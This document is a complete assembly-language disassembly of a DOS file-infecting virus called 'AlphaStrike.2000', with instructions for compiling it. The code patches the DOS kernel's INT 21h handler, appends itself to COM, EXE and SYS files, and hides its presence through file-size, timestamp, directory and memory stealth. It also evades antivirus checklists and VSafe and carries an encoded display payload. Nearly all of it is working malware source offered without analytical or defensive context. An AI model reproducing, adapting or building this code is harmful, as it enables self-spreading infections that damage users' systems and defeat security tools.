; AlphaStrike.2000 or whatever its called by Neurobasher. disasm by retch. ; there are no comments. there are no need for comments unless you are lame. ; ; GREETZ R LAYME SO I WEEL NOT DO NE. ; ; 2 COMPYLE: ; tasm /m alpha.asm (EYE UZED FORE DOT SOMETHING) ; tlink alpha.obj (umm... 2.xx) ; exe2bin alpha.exe alpha.com ; ; i am contactable via retro@pcscav.com .model tiny .code .286 virus_start: mov di, 0F242h mov si, word ptr ds:[2h] sub si, di cmp si, 1000h call getip getip: mov bp, sp mov bp, [bp] cld mov ax, 4458h int 21h jb checkifdosinhma mov ds, es:[bx+0Eh] mov si, 0Bh jmp addressatSI sysentry: pushf pusha push ds push es jmp virus_start checkifdosinhma:mov ax, 3306h int 21h cmp al, 6 jnz checkdosversion cmp dh, 10h jnz go_abortinstall mov ax, 0FFC4h jmp compareints checkdosversion:mov ah, 30h int 21h xchg al, ah cmp ax, 31Eh mov ax, 1Bh jb go_abortinstall compareints: mov cx, 0Ah mov ds, cx mov es, cx mov si, 14h mov bx, si lea di, [bx+si] cmpsw jnz abortinstall cmpsw go_abortinstall:jnz abortinstall lds si, [bx] add si, ax cmp al, 1Bh jz checkifkernelpatched mov si, [si+8] addressatSI: lds si, [si] checkifkernelpatched: cmp byte ptr [si], 0EAh jz abortinstall mov cs:[bp+(kernaladdress )-getip], si mov cs:[bp+(kernaladdress+2)-getip], ds call getmemory jnz abortinstall lea si, [bp+(virus_start)-getip] push cs pop ds mov es, cx mov cx, offset header rep movsb sub ax, ax mov cl, 0C0h rep stosb mov di, offset newint21 mov es:[di+1], al lds si, ds:[bp+(kernaladdress)-getip] mov ax, [si] mov cl, 6Ch mov bx, 6 cmp al, 0FAh jz patchkernel mov bl, 7 cmp al, 2Eh jz patchkernel mov cl, 69h mov bl, 5 cmp al, 80h jnz abortinstall patchkernel: mov es:[di+savecmp-newint21], cl add bx, si mov es:[di+kernaladdress-newint21], bx mov byte ptr [si], 0EAh mov [si+1], di mov [si+3], es abortinstall: pop ax sub si, si mov ax, ss cmp ah, 90h jz restoresys mov ah, 62h int 21h push bx mov ds, bx mov cx, [si+2Ch] jcxz restorehost mov ds, cx mov ch, 8 findcomspec: cmp word ptr [si], 4F43h jnz keeplooking cmp word ptr [si+6], 3D43h jz foundcomspec keeplooking: inc si loop findcomspec jmp restorehost foundcomspec: mov ax, 3D00h lea dx, [si+8] int 21h xchg ax, bx mov ah, 3Eh int 21h restorehost: pop ax mov ds, ax mov es, ax add ax, 10h mov bx, ax db 81h,0C3h savess dw 0FFF0h cli db 0BCh savesp dw 0FFFEh mov ss, bx db 5 savecs dw 0FFF0h mov cs:[bp+jumpsegment-getip], ax cmp sp, 0FFFEh jnz zeroregs mov word ptr ds:100h, 20CDh first2 = $-2 mov byte ptr ds:102h, 90h next1 = $-1 zeroregs: sub ax, ax sub bx, bx sub cx, cx cwd sub si, si sub di, di sub bp, bp sti jmp near ptr jumptohost db 0EAh jumptohost db 0EAh saveip dw 100h jumpsegment dw 0 restoresys: pop es pop ds mov word ptr [si+8], 0 sysret2 = $-2 popa popf db 68h sysret dw 0 ret getmemory: call getlastmcb mov ax, ds mov bx, [si+3] sub bx, dx add ax, bx xchg ax, cx xchg ax, bx jmp setnewmcbsize setlastmcbsize: call getlastmcb dec ax ; ax=cs mov cx, ax ; cx=ax sublastmcbseg: sub ax, bx ; ax=ax-lastmcbseg setnewmcbsize: dec ax or di, di jnz dontsetmcbsize mov [si+3], ax dontsetmcbsize: ret modifytomseginpsp: mov ah, 62h int 21h mov ds, bx int 12h shl ax, 6 sub ax, 87h mov ds:2, ax hideourmem: call getlastmcb add ax, dx ; ax=virusparasize+virusseg+1 jmp sublastmcbseg getlastmcb: push es mov ah, 52h int 21h mov ds, es:[bx-2] mov ax, 5802h int 21h cbw push ax mov ax, 5803h mov bx, 1 int 21h ; set umb's as part of chain sub si, si mov di, si getlastmcbloop: call getnextmcb jnz getlastmcbloop pop bx push ax mov ax, 5803h int 21h pop bx pop es mov ax, cs inc ax mov dx, 87h ; 2160d / 10h ret getnextmcb: cmp word ptr [si+10h], 20CDh jnz checkiflast cmp byte ptr [si+15h], 0EAh jnz checkiflast inc di checkiflast: cmp byte ptr [si], 5Ah ; 'Z' jz islastblock mov ax, ds inc ax add ax, [si+3] mov ds, ax islastblock: ret newint21: db 0EBh virusactive db 4Ch mov cs:saveds, ds push cs pop ds mov savedi, di mov di, offset saveds mov byte ptr [di+virusactive-saveds], 4Ch mov [di+savees-saveds], es mov [di+saveax-saveds], ax mov [di+savebx-saveds], bx mov [di+savecx-saveds], cx mov [di+savedx-saveds], dx mov [di+savesi-saveds], si mov [di+savebp-saveds], bp push cs pop es mov di, offset functions db 0B9h stealthmode dw 14h xchg al, ah xor al, 5Fh cld repne scasb jnz exithandler sub di, offset functions+1 shl di, 1 add di, offset functionoffsets push offset exithandler push word ptr [di] jmp near ptr restoreregs exithandler: call restoreregsandsetvirusactive emulateoldkernal: cmp ah, 6Ch savecmp = $-1 ja zeroal_iret cli db 0EAh kernaladdress dd 0FDC840FEh writeheader: mov ah, 40h mov cx, 18h readwritefromsi:mov dx, si int21: cli pushf call cs:kernaladdress ret zeroal_iret: mov al, 0 iret restoreregsandsetvirusactive: call near ptr restoreregs setvirusactive: mov cs:virusactive, 0 ret memstealth: call setlastmcbsize ; 48h/49h/4Ah restoreregs: db 0B8h saveds dw 9850h mov ds, ax db 0B8h savees dw 6D8h mov es, ax db 0B8h saveax dw 4B00h db 0BBh savebx dw 241h db 0B9h savecx dw 209h db 0BAh savedx dw 40E6h db 0BEh savesi dw 0E4h db 0BFh savedi dw 0 db 0BDh savebp dw 6914h ret loc_0_272: mov dx, 3F5h mov al, 4 mov ch, 4 out dx, al loop $ mov ch, 4 out dx, al loop $ in al, dx test al, 40h ret message db 002h,0E0h,052h,0BFh,0B4h,0B0h,0B8h,0BFh,0E0h,0ADh db 0ACh,0AEh,0B7h,0B5h,0BBh,051h,0E0h,007h,0E0h,0BFh db 09Ch,08Ah,09Fh,092h,09Dh,09Bh,09Ch,0E0h,0ACh,09Fh db 09Dh,08Ch,097h,09Dh,09Fh,094h,0E0h,0AAh,097h,08Eh db 09Fh,094h,0E0h,0B7h,093h,090h,094h,09Fh,092h,08Ch db 0E0h,09Eh,087h,0E0h,0B2h,0BBh,0ABh,0AEh,0B1h,0BEh db 0BFh,0ADh,0B8h,0BBh,0AEh,0D9h,0C7h,0CDh,0E0h,0D1h db 0E0h,0B9h,09Bh,08Eh,093h,09Fh,092h,087h,0E0h,002h setnofilestealth: mov byte ptr cs:stealthmode, 12h activate: ret call clearscreen mov ah, 2 mov bh, 0 mov dx, 0C00h int 10h mov si, offset message mov cx, 4Eh displayloop: lods byte ptr cs:[si] neg al int 29h loop displayloop xor ax, ax int 16h clearscreen: mov ax, 3 int 10h setnoactivate: mov byte ptr cs:activate, 0C3h ret execute: call setfullstealth call setnoactivate cmp al, 1 mov al, 90h call setdirstealth jnz infectdx mov ax, 3D02h int 21h jb ret3 xchg ax, bx call disinfecthandle mov ah, 3Eh int 21h mov byte ptr ds:activate, 90h ret3: ret infectsi: mov dx, si infectdx: cmp ax, 4300h jz ret3 call sethandletozero cmp ah, 3Dh jnz dontsetfullstealth call setfullstealth dontsetfullstealth: mov si, dx mov di, offset buffer push cs pop es copyname: lodsb or al, al jz namecopied stosb jmp copyname namecopied: stosb mov cl, byte ptr cs:saveax+1 mov ax, [si-7] mov bx, [si-0Bh] cmp cl, 3Dh jnz notopen db 0EBh dontopenchklist db 16h cmp ax, 5453h ; chkliST? jnz notopen cmp bx, 4B48h ; cHKlist? jnz notopen pop ax call restoreregsandsetvirusactive mov ax, 2 stc retf 2 notopen: cmp cl, 4Bh jnz checkifavactive mov cl, 16h cmp ax, 5641h jnz notmsavorcpav mov cl, 0 notmsavorcpav: mov cs:dontopenchklist, cl cmp bx, 5343h jz setmemstealthonly cmp bx, 4142h jz setmemstealthonly cmp ax, 4148h jz setmemstealthonly cmp ax, 4A52h jz setmemstealthonly cmp word ptr [si-8], 495Ah jnz leavestealthmode setmemstealthonly: mov byte ptr cs:stealthmode, 8 leavestealthmode: push ax mov ax, 160Ah int 2Fh cmp al, 0Ah pop ax jnz checkifavactive cmp ax, 5641h jz checkifavactive cmp bx, 544Eh jz checkifavactive call hideourmem checkifavactive: mov bx, 0FF0Fh xchg ax, bx int 21h cmp al, 1 jz ret4 mov bl, 0 call vsafe push cs pop ds mov ah, 2Fh int 21h push es push bx mov ah, 1Ah mov dx, offset tempdta int 21h mov ax, 3524h int 21h push es push bx mov ah, 25h mov dx, offset zeroal_iret int 21h mov ah, 4Eh mov cl, 27h call setdxtobuffer_int21 jb restoreint24anddta mov si, offset header sub di, di mov al, [si+18h] mov attribs, al cmp byte ptr [si], 2 ja notdriveAorB call loc_0_272 jz checkfiletype restoreint24anddta: mov ax, 2524h pop dx pop ds int 21h mov ah, 1Ah pop dx pop ds int 21h togglevsafe db 0B3h vsafestatus db 16h vsafe: mov ax, 0FA02h mov dx, 5945h int 16h mov cs:vsafestatus, cl ret4: ret notdriveAorB: cmp [si+12h], di jnz checkfiletype cmp word ptr [si+10h], 2 jb restoreint24anddta cmp byte ptr [si], 3 jb checkfiletype mov ah, 2Ah int 21h sub cx, 7BCh mov ax, [si+1Bh] shr ax, 1 cmp ah, cl jnz checkfiletype shr ax, 4 and al, 0Fh cmp al, dh jz restoreint24anddta checkfiletype: mov bp, offset setcarry_ret cmp word ptr [si+21h], 4254h ; TB* jz restoreint24anddta cmp word ptr [si+0Ch], 4F43h ; CO jnz notcominfection mov bp, offset infectcom notcominfection:cmp word ptr [si+1Eh], 0Bh jb restoreint24anddta cmp byte ptr [si+1Ch], 0C8h jnb restoreint24anddta mov al, [si+18h] and al, 7 jz attributesok sub cx, cx call setattribs jb restoreint24anddta attributesok: mov ax, 3D02h call setdxtobuffer_int21 jb near ptr restoreattribs xchg ax, bx mov ah, 3Fh mov cx, 19h call readwritefromsi mov ax, [si] xchg al, ah cmp ax, 4D5Ah jnz notexeinfection mov bp, offset infectexe jmp notsysinfection notexeinfection:cmp ax, 0FFFFh jnz notsysinfection mov bp, offset infectsys notsysinfection:call bp jb dontwriteheader call writeheader dontwriteheader:mov ax, 5700h mov cx, [si+19h] mov dx, [si+1Bh] inc ax int 21h mov ah, 3Eh int 21h restoreattribs db 0B1h attribs db 20h call setattribs jmp restoreint24anddta setattribs: mov ax, 4301h setdxtobuffer_int21: mov ch, 0 mov dx, offset buffer jmp int21 infectexe: cmp byte ptr [si+18h], 40h ;WINDOZE EXE ? jz setcarry_ret mov ax, [si+4] dec ax mov cx, 200h mul cx add ax, [si+2] adc dx, di cmp [si+1Dh], ax jnz setcarry_ret cmp [si+1Fh], dx jz nointernaloverlays setcarry_ret: stc ret nointernaloverlays: mov ax, [si+0Eh] mov ds:savess, ax mov ax, [si+10h] mov ds:savesp, ax mov ax, [si+16h] mov ds:savecs, ax mov ax, [si+14h] mov ds:saveip, ax call appendvirus jb exitinfectexe mov ax, [si+8] mov cl, 10h mul cx neg ax not dx add ax, [si+1Dh] adc dx, di add dx, [si+1Fh] div cx mov [si+16h], ax mov [si+14h], dx dec ax mov [si+0Eh], ax mov word ptr [si+10h], 9D2h add word ptr [si+0Ah], 0ADh mov ax, [si+1Dh] mov dx, [si+1Fh] add ax, virussize adc dx, di mov cx, 200h div cx inc ax mov [si+4], ax mov [si+2], dx clc exitinfectexe: ret infectcom: cmp word ptr [si+1Eh], 0D6h ja exitcominfect mov ax, [si] mov word ptr ds:first2, ax mov al, [si+2] mov byte ptr ds:next1, al mov ax, 0FFF0h mov ds:savecs, ax mov ds:savess, ax mov word ptr ds:saveip, 100h mov word ptr ds:savesp, 0FFFEh call appendvirus jb exitcominfect mov byte ptr [si], 0E9h mov ax, -3 ;0FFFDh add ax, [si+1Dh] mov [si+1], ax clc exitcominfect: ret infectsys: mov ax, [si+8] mov word ptr ds:sysret, ax mov word ptr ds:sysret2, ax call appendvirus jb ret5 mov ax, [si+1Dh] add ax, offset sysentry mov [si+8], ax clc ret5: ret appendvirus: mov al, 2 call lseek mov ah, 40h mov cx, virussize cwd call int21 cmp ax, cx stc jnz ret1 add byte ptr [si+1Ch], 0C8h lseekstart: mov al, 0 lseek: mov ah, 42h cwd mov cx, dx doint21: int 21h ret1: ret lseekbeforeend: mov ax, 4202h mov cx, 0FFFFh jmp doint21 checkhandle: cmp bl, 5 ;LAME HANDLE CHEQ. jb exittimestealth checkinfection: mov ax, 5700h int 21h jb exittimestealth cmp dh, 0C8h exittimestealth:ret blocklseek: cmp al, 2 jnz ret1 call checkinfection jb ret1 pop ax call near ptr restoreregs push cx sub dx, virussize sbb cx, 0 int 21h pop cx jmp setvirusactive_exit setnodirstealth:mov al, 0C3h setdirstealth: mov byte ptr cs:fcbdirstealth, al ret fcbdirstealth: nop inc sp inc sp int 21h cmp al, 0FFh jz setvirusactive_exit pushf push ax call getdta cmp byte ptr [bx], 0FFh jnz notextended add bx, 7 notextended: cmp [bx+1Ah], al jb exitdirstealth sub [bx+1Ah], al add bx, 3 jmp stealthdirsize getdta: mov ah, 2Fh int 21h mov al, 0C8h push es pop ds ret asciidirstealth:inc sp inc sp int 21h jb setvirusactive_exit pushf push ax call getdta cmp [bx+19h], al jb exitdirstealth sub [bx+19h], al stealthdirsize: cmp word ptr [bx+1Bh], 0Bh jb exitdirstealth sub word ptr [bx+1Ah], virussize sbb word ptr [bx+1Ch], 0 exitdirstealth: call restoreregs pop ax popf setvirusactive_exit: call setvirusactive jmp exitkeepflags readoldheader: mov al, 1 call lseek push cs pop ds mov oldposlo, ax mov oldposhi, dx mov si, offset header cmp handle, bl jz ret0 mov dx, 0FFDFh call lseekbeforeend mov ah, 3Fh mov cx, 21h call readwritefromsi mov handle, bl lseektooldpos: mov ax, 4200h db 0B9h oldposhi dw 0 db 0BAh oldposlo dw 0 int 21h ret0: ret disinfecthandle:call checkhandle jb ret0 push cx push dx call readoldheader call lseekstart call writeheader mov dx, 0F830h ; -virussize call lseekbeforeend mov ah, 40h sub cx, cx int 21h pop dx pop cx sub dh, 0C8h mov ax, 5701h int 21h jmp lseektooldpos stealthread: mov bp, cx call checkhandle jb ret0 pop ax call readoldheader sub ax, [si+1Dh] sbb dx, 0 sub dx, [si+1Fh] js adjustread call restoreregsandsetvirusactive sub ax, ax clc exitkeepflags: retf 2 adjustread: add ax, bp adc dx, 0 jnz bigread sub bp, ax bigread: push bp call near ptr restoreregs pop cx int 21h pushf push ax jb exitstealthread push ds pop es mov di, dx push cs pop ds mov si, offset header cmp oldposhi, 0 jnz exitstealthread mov ax, oldposlo cmp ax, 18h jnb exitstealthread add si, ax add cx, ax cmp cx, 18h jbe moveit sub ax, 18h neg ax xchg ax, cx moveit: cld rep movsb exitstealthread:call restoreregsandsetvirusactive pop ax popf_exitwithflags: popf jmp exitkeepflags gettimestealth: cmp byte ptr cs:stealthmode, 12h jnz dotimestealth cmp al, 0 jz ret2 setfullstealth: mov byte ptr cs:stealthmode, 14h ret dotimestealth: cmp al, 0 jnz settimestealth inc sp inc sp int 21h pushf jb setvirusactive_exit1 call removemarkerfromdh setvirusactive_exit1: call setvirusactive jmp popf_exitwithflags settimestealth: call setfullstealth mov ax, 5700h int 21h jb ret2 pop ax cmp dh, 0C8h call near ptr restoreregs jb removemarkeranddoint21 cmp dh, 0C8h jnb doint21andexit add dh, 0C8h doint21andexit: int 21h pushf jmp setvirusactive_exit1 removemarkeranddoint21: call removemarkerfromdh jmp doint21andexit removemarkerfromdh: cmp dh, 0C8h jb notmarked sub dh, 0C8h notmarked: ret sethandletozero:mov cs:handle, 0 ret2: ret ; NOTE : ALL FUNKTIONZ ARE XORED WITH 5Fh functions db 013h ; 4Ch - prog terminate db 017h ; 48h - create mem block db 016h ; 49h - release memory db 015h ; 4Ah - resize mem block db 00Dh ; 52h - get SYSVARS db 0B5h ; 0EAh - ALLOC HUGE SEG db 06Dh ; 32h - GET DPB db 014h ; 4Bh - program EXEC db 062h ; 3Dh - open file db 04Eh ; 11h - fcb FindFirst db 04Dh ; 12h - fcb FindNext db 011h ; 4Eh - ASCII FindFirst db 010h ; 4Fh - ASCII FindNext db 008h ; 57h - get/set file time db 033h ; 6Ch - extended open db 01Ch ; 43h - get/set attribs db 061h ; 3Eh - handle close db 01Fh ; 40h - handle write db 01Dh ; 42h - lseek db 060h ; 3Fh - handle read functionoffsets dw offset setnofilestealth dw offset memstealth dw offset memstealth dw offset memstealth dw offset hideourmem dw offset modifytomseginpsp dw offset setnodirstealth dw offset execute dw offset infectdx dw offset fcbdirstealth dw offset fcbdirstealth dw offset asciidirstealth dw offset asciidirstealth dw offset gettimestealth dw offset infectsi dw offset infectdx dw offset sethandletozero dw offset disinfecthandle dw offset blocklseek dw offset stealthread header db 0CDh,020h,090h tempdta db 3Ch dup (0) buffer db 80h dup (0) handle db 0 virussize = 7D0h end virus_start